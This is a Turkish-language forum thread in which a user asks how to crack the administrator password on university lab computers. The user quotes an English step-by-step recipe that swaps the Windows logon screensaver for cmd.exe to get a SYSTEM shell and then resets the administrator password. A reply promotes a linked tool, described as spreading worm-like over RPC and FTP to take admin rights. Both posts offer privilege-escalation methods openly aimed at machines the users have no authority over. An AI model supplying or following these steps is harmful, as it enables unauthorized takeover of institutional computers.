Crack An Admin Pass
-
Slm arkadaslar,üniversitede computer pools ta admin pass i kirmaya calistim,birkactane yöntem denedim ama olmadi.
Benim en cok güvendigim, buldugum asagidaki komutlardi ama onlarda ise yaramadi :((
If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator <newpassword>
and then log in with the new account.
Acaba komutlarda mi bi hata vardi bilmiyorum.Bazi programlar buldum ama bilgisayarlar,yüklemeye izin vermiyo zaten.Ne yapabilirim bilmiyorum.Aranizda bundan anlayan varsa,ve yardim ederse sevinirim,Bye!!! -
cok daha basit sekilde unniversitedekimakinalirin mna koyacak bir yazilim ;))
universide dsin ve sana ozel user pass var ama belli yetkimi vermisler ama administrator catir catir tikmemi istiyon aha al ozaman
http://emco.is/
remote desktop dene seyi indir sonra acinac dok networku de ve bekle oha diyecegin bir yazilim salinda resmen worm matigi ile caliyor ;)
rpc den paket gonderim ftp acip kendini kopyalatim run ettiriyor inamayacaksin belki ama dogru hadi kolay administrator tikmeler -
StanleyJopson bunu yazdı:
-----------------------------
cok daha basit sekilde unniversitedekimakinalirin mna koyacak bir yazilim ;))
universide dsin ve sana ozel user pass var ama belli yetkimi vermisler ama administrator catir catir tikmemi istiyon aha al ozaman
http://emco.is/
remote desktop dene seyi indir sonra acinac dok networku de ve bekle oha diyecegin bir yazilim salinda resmen worm matigi ile caliyor ;)
rpc den paket gonderim ftp acip kendini kopyalatim run ettiriyor inamayacaksin belki ama dogru hadi kolay administrator tikmeler
-----------------------------
kafam karıştı ya, klavyenin 1-2 tuşu basmıyo galiba :)
neyse sonunda anladım ne yazdığını siteye girdim ilginç şeyler var, saol...
-
Sagol Stanley
Toplam Hit: 2904 Toplam Mesaj: 4